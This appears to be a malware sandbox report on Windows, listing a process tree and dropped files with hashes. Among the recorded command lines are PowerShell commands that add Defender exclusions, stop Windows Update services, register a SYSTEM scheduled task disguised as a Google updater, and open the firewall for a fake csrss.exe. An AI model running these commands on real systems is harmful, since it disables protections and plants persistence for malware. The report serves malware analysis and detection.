"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10010837553238454039,2829693857467305620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8470878042280355721,5481356603657520018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 8632 -ip 8632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8632 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\F9AD.exe

C:\Users\Admin\AppData\Local\Temp\F9AD.exe

C:\Users\Admin\AppData\Local\Temp\FA89.exe

C:\Users\Admin\AppData\Local\Temp\FA89.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6692 -ip 6692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 784

C:\Users\Admin\AppData\Local\Temp\214C.exe

C:\Users\Admin\AppData\Local\Temp\214C.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\26CC.exe

C:\Users\Admin\AppData\Local\Temp\26CC.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\2479.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 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

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3132 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\E2BA.exe

C:\Users\Admin\AppData\Local\Temp\E2BA.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

Network

Files


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58723d.TMP

MD5 773185ad1f158f6fe8be4103badf79b3
SHA1 109b844af1ece09fd41c86e7d568a2050e7c3c9d
SHA256 a722aaa3ed82bb09f144d458716e1a237a5c301dfdbf060f3a3e933ee44d4b20
SHA512 72b686d372fd0840335205a1673bfef869765f39f8158f2bfdc8848d61b04adc701bb53fd14cf19b2c656217283e5b3a211d6c22acfe7d7330854fe6850510bb

memory/6400-495-0x0000000000400000-0x000000000043C000-memory.dmp

memory/6400-500-0x00000000740D0000-0x0000000074880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

memory/6400-512-0x0000000007D80000-0x0000000008324000-memory.dmp

memory/6400-515-0x00000000078B0000-0x0000000007942000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

memory/6400-530-0x0000000007AD0000-0x0000000007AE0000-memory.dmp

memory/6400-535-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 fdbf5bcfbb02e2894a519454c232d32f
SHA1 5e225710e9560458ac032ab80e24d0f3cb81b87a
SHA256 d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c
SHA512 9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 4e08109ee6888eeb2f5d6987513366bc
SHA1 86340f5fa46d1a73db2031d80699937878da635e
SHA256 bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339
SHA512 4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661

memory/6400-544-0x0000000008950000-0x0000000008F68000-memory.dmp

memory/6400-552-0x0000000008330000-0x000000000843A000-memory.dmp

memory/6400-553-0x0000000007B80000-0x0000000007B92000-memory.dmp

memory/6400-558-0x0000000007BE0000-0x0000000007C1C000-memory.dmp

memory/6400-561-0x0000000007C20000-0x0000000007C6C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 43b31067ba67bbded2abdbac34759783
SHA1 ea07ede70dc7c5a5158ef744ea419c395ea23842
SHA256 f127129cfee9e45c71f66f2fb8683e397bef0c3ab7ef9a0139908a18c52a9c70
SHA512 f6332d0a47ab489557bf7fe2877e04bff04868cdea1532cce273b51581a29da29d99e33e05a9d21ae61a0f9900d70776edd834552dda347dfef0c04e0df839f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034

MD5 740a924b01c31c08ad37fe04d22af7c5
SHA1 34feb0face110afc3a7673e36d27eee2d4edbbff
SHA256 f0e1953b71cc4abbffdd5096d99dfb274688e517c381b15c3446c28a4ac416e0
SHA512 da7061f944c69245c2f66b0e6a8b5a9bca91bda8a73f99734dcb23db56c5047de796fa7e348ff8840d9ac123436e38a4206408573215b7e5e98942ea6d66bb7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 683b9e24c60ea3dc9c14b79a92b7a5eb
SHA1 0a0aa7f0a488d749a86cc3578eb72fae4faf3519
SHA256 2167ff17a667a40da67fb75506e6bdbc218b55199cf58127d064b2ae5af45982
SHA512 a6b94201d6bb50d34acbb4c150924ac837f4ea488240bc00060e8ca6847d3b82b71879f89c65f2af4a3a0ee6ebb2a08376aef4be0f3f7a9d407d7e59bed79e73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7a3d58a7aff5f7e41a3a0056ed8f2919
SHA1 1ae53ae793634d768aa01544f56f010503a7c5d1
SHA256 950c30ff31bcfda9138af33d5f4bb493f5752f038a4a892f8674b1cfd0a73bf8
SHA512 51786c6594ad5c15b1d51b8c51ecdbc296a5ba665159c227892b310addee6331d4c345755542f0ddfcd0ffcb1da10721657d9f3a3307f5e5fd50caaa0a9a773d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/6400-855-0x00000000740D0000-0x0000000074880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 62d8d44177b61e25e13cbd27be03310c
SHA1 6f800a84d1a75dbe723415b215c030a925d136ea
SHA256 8724c91621020472aac8452b2e6fe4fe7f83262700e886fa213f37e7b0ab6a57
SHA512 419cd45c3d4c33c9a9e618fab50840dc2a4ee1f2c5a784688bdea597ae807365eebaa5e8792f2af5d8dba7a8517bd86d6bdb853bf954aefd7b444881609d8f11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe58dd1c.TMP

MD5 5048cf08441a43edc53d6eafd5c1d874
SHA1 a5252840aad5defc4dad4c70e034003675467127
SHA256 970a8447effd055a7d5d2c9a7650d38987386110181cb52288ecb8e35b9cdf5a
SHA512 ffa4a62b77156e1e65ff5eb9b343a52350b989fe1d57d884c4bd0cc2afce9e0e82ef361d435709d3808a372b9788ab26ab7ec361e0b9310458842b89f9fd5d65

memory/6400-961-0x0000000007AD0000-0x0000000007AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 07ef603989f9b0576a9427663bb69118
SHA1 669f28c5facbaa7faa5e0fbeae8d92c8b938fd62
SHA256 d376e47c8b2aaa43a0151d9dff768189b711a191e617c11cd08eeff2db76bf4d
SHA512 6178feae85f203cb6fe5a6367b60748ea7fa99a8df276be4d3ea12913a72bfba4f2c5c7c8b5fec501e15a3b5d5d9e1f6e82c47c4bce4c0692e4fc9b210883775

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 94a48c438ff3a73bc2402c03c13f39a8
SHA1 45d11d76ca0c14b44a4cad0a66ed981a8b301c26
SHA256 b013da412cb6433281a2646e5d94097ffab71786a2355f5e8528793c82d5da68
SHA512 fbae88817f5dd2987160be9627a81691ab325493b58136643d79c71d141a1e07f00a154982e59d1122c49fa6101f98920b0ca4f5d61980a6e76ec4200d12b19f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c8bfb581-fe87-432e-94a6-31ba44519e38\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 de842a15724c0223fb391d28d71c65ee
SHA1 83cf2897f19364f5a68789864e69015931505d80
SHA256 f08e54be1a74f9083374c33d412ef38fb659f67ca60addafb3c178e31acbc9e0
SHA512 c3687e89fb6b59acbd2e139bb1655c84637b7e4ae9e2dcae99f8f25a78cfa9d3c8e9d6c68cd14f9448286b26ef132c49a942c5010eab0a944f01953005fbce76

memory/3260-1172-0x00000000008F0000-0x000000000090E000-memory.dmp

memory/3260-1173-0x00000000740D0000-0x0000000074880000-memory.dmp

memory/6692-1174-0x00000000006A0000-0x00000000006FA000-memory.dmp

memory/6692-1176-0x0000000000400000-0x000000000046F000-memory.dmp

memory/3260-1179-0x0000000005160000-0x0000000005170000-memory.dmp

memory/6692-1180-0x00000000740D0000-0x0000000074880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c70ae2c120eac5955cfc47dce628c2d2
SHA1 1d40fb883519f1c5864e99091509f4967cec4e9a
SHA256 a9894db3141ebeab0b606466d3a1dd3d0e1e00511524df19b2ab6bdd665fbeb7
SHA512 0ee58ff8f0c0c5d59e028bb1e5cc1763a54e12c83fb3e70af943321ddd3426de70e6ed9ca4a5d93d836264c051ff86f73f5d1155956738ed0cc1bc11df2e6f4e

memory/6692-1193-0x00000000740D0000-0x0000000074880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 06799a99c67683d326587033c35ad11f
SHA1 66f7e348d5cabf0ec99c5ce118383012a4456ffc
SHA256 9b261faec0b75299cf586021703b4c7d361e78a7dce829f02323a0ac5fff979e
SHA512 49ee294b2f855870caa088b7590a75d9e0487b3b43072ffc2747ae29c0624dd40be2fb79c9133a15f03fe60acb3e49a7332ec52037f61de0a6b12443adde2933

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ccf437727caa6b60f8ad302c16a79a7c
